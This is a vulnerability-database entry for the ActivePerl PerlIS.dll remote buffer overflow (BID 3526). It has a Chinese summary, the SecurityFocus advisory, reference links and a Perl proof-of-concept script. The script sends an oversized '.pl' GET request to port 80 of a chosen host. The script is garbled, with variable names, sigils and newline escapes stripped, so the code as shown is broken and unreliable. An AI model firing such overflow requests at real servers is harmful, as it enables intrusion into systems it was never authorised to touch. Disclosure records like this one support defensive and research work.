https://www.exploit-db.com/exploits/21154
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-035

ActivestateActivePerl5.6.1.629及其更早版本的PerlIS.dll存在缓冲区溢出漏洞。远程攻击者可以借助以.pl扩展名结尾的超长文件名的HTTP请求执行任意代码。

source: http://www.securityfocus.com/bid/3526/info
  
ActivePerl is an implementation of the Perl scripting language for Microsoft Windows systems developed by Activestate. ActivePerl allows for high-performance integration with IIS using a DLL called 'perlIIS.dll' to handle a '.plx' ISAPI extension.
  
perlIIS.dll contains a remotely exploitable buffer overflow vulnerability in handling of the URL string. It is due to an unbounded string copy operation.
  
All versions of ActivePerl prior to build 630 of ActivePerl 5.6.1 are believed to be vulnerable. This vulnerability requires that the option "Check that file exists" be disabled. This option is enabled by default.
  
Exploitation of this vulnerability may allow for remote attackers to gain access to the target server.

#!/usr/bin/perl -w

use IO::Socket;

 = "ActivePerl 5.6.1.629";

unless (@ARGV == 1) {
  print "n Exploit by Sapient2003n";
  die "usage: -bash <host to exploit>n";
}
print "n Exploit by Sapient2003n";

 = "A" x 360;
 = "GET /.pl HTTP/1.0nn";

 = IO::Socket::INET->new(
        PeerAddr => [0],
        PeerPort => 80,
        Proto    => "tcp",
) or die "Can't find host [0]n";
print  ;
print "Attempted to exploit [0]...n";
close();

来源:BID
名称:3526
链接:http://www.securityfocus.com/bid/3526
来源:BUGTRAQ
名称:20011115NSFOCUSSA2001-07:ActivePerlPerlIS.dllRemoteBufferOverflowVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=100583978302585&w;=2
来源:bugs.activestate.com
链接:http://bugs.activestate.com/show_bug.cgi?id=18062
来源:XF
名称:activeperl-perlis-filename-bo(7539)
链接:http://xforce.iss.net/static/7539.php
来源:OSVDB
名称:678
链接:http://www.osvdb.org/678